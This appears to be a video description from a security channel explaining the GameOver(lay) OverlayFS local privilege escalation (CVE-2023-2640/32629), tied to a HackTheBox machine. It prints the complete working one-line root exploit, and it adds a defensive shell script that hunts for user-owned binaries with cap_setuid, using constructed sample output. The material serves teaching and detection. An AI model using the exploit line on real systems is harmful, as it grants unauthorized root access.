Gameover(lay) Exploit Explained

Published: 14 March 2024
on channel: 0xdf

The Gameover(lay) (CVE-2023-2640 / CVE-2023-32629) vulnerability was a big deal in late July 2023. The POC is super short, yet complex. We'll walk through it line by line to understand what it does and how it gives a low-privileged user root access by abusing OverlayFS and the way it handles file attributes (like capabilities) when syncing files between the upper and lower layers.

Exploit: unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("rm -rf l m u w; id")'
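As an added defender-side example (not from 0xdf's video or post, and not part of the POC), a small POSIX shell helper that hunts for the artifact the one-liner leaves behind: a user-owned binary such as u/python3 carrying cap_setuid. It parses getcap -r style output (both libcap formats), reports any setuid-class capability and any capability outside system directories, and prints the user-namespace sysctls the unshare -rm step depends on. The sample lines are constructed, and the system-directory allowlist and hunt paths are assumptions you should adjust.

```sh
#!/bin/sh
# Hypothetical hunting helper; the directory allowlist below is an assumption.

# Constructed sample of `getcap -r` output. Both libcap output styles appear:
# "path cap=flags" (newer) and "path = cap+flags" (older).
SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/home/alice/u/python3 cap_setuid=eip
/tmp/work/u/python3 = cap_setuid+eip
/opt/vendor/bin/sniff cap_net_raw=ep'

# Print "path<TAB>reason" for every getcap line worth a second look:
# any cap_setuid/cap_setgid grant, and any capability outside system dirs.
suspicious_caps() {
    printf '%s\n' "$1" | awk '
        NF < 2 { next }                      # blank or malformed line
        { path = $1; caps = $NF }            # last field holds the cap text in both formats
        caps ~ /cap_set(uid|gid)/ { print path "\tsetuid-class capability"; next }
        path !~ /^\/(usr|bin|sbin|lib|lib64)\// { print path "\tcapability outside system dirs" }
    '
}

# Live scan of locations an unprivileged user can normally write to.
scan_user_writable_dirs() {
    command -v getcap >/dev/null 2>&1 || { echo "getcap not installed" >&2; return 0; }
    suspicious_caps "$(getcap -r /home /tmp /var/tmp /dev/shm 2>/dev/null)"
}

# The POC needs unprivileged user namespaces (unshare -rm). Debian/Ubuntu
# kernels expose kernel.unprivileged_userns_clone; upstream has
# user.max_user_namespaces. Report whichever is present.
userns_status() {
    f=/proc/sys/kernel/unprivileged_userns_clone
    [ -r "$f" ] && printf 'kernel.unprivileged_userns_clone=%s\n' "$(cat "$f")"
    f=/proc/sys/user/max_user_namespaces
    [ -r "$f" ] && printf 'user.max_user_namespaces=%s\n' "$(cat "$f")"
    return 0
}

echo "== constructed sample =="; suspicious_caps "$SAMPLE_GETCAP"
echo "== live =="; scan_user_writable_dirs; userns_status
```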

HackTheBox Analytics Blog post: https://0xdf.gitlab.io/2024/03/23/htb...
HackTheBox Analytics: https://www.hackthebox.com/machines/a...
OverlayFS explained post from Julia Evans: https://jvns.ca/blog/2019/11/18/how-c...
Exploit Tweet from @liadeliyahu: / 1684841527959273472
CVE-2023-2640: https://www.cvedetails.com/cve/CVE-20...
CVE-2023-32629: https://www.cvedetails.com/cve/CVE-20...

☕ Buy Me A Coffee: https://www.buymeacoffee.com/0xdf

[00:00] Introduction
[00:47] Show exploit
[01:23] unshare / namespaces
[02:54] Setup files within namespace
[04:39] mount OverlayFS
[05:56] Using touch to get files into upper
[06:20] Exit namespace and escalate
[07:36] Revisiting exploit
[08:41] Conclusion

#pentest #ctf #bugbounty #gameoverlay #linux #privesc
